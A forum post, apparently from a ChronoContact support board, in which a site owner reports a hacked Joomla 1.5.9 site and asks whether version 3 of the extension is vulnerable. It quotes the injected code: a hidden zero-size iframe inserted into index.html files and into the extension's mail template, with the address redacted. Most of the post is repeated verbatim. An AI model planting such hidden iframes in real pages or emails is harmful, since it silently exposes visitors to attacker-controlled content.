Hi, one of the site I have that use chrono has been hacked.
All of the index.html files have been modified and at the end of the code an iframe has been entered.
However I also noticed that in com_chronocontact/libraries/mails.php there is also this code.
<head>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">
<base href=\"".JURI::base()."/\" />
<title>Email</title>
</head>
<body>$email_body<iframe src="THE_ADDRESS_TO_THE_WEB_PAGE_WAS_HERE" width="0" height="0"></iframe></body>
</html>
Im have v3 installed on a windows server.
The joomla version is 1.5.9
Can you tell me if v3 is vulnerable?
Thanks for the advice
M
All of the index.html files have been modified and at the end of the code an iframe has been entered.
However I also noticed that in com_chronocontact/libraries/mails.php there is also this code.
<head>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">
<base href=\"".JURI::base()."/\" />
<title>Email</title>
</head>
<body>$email_body<iframe src="THE_ADDRESS_TO_THE_WEB_PAGE_WAS_HERE" width="0" height="0"></iframe></body>
</html>
Im have v3 installed on a windows server.
The joomla version is 1.5.9
Can you tell me if v3 is vulnerable?
Thanks for the advice
M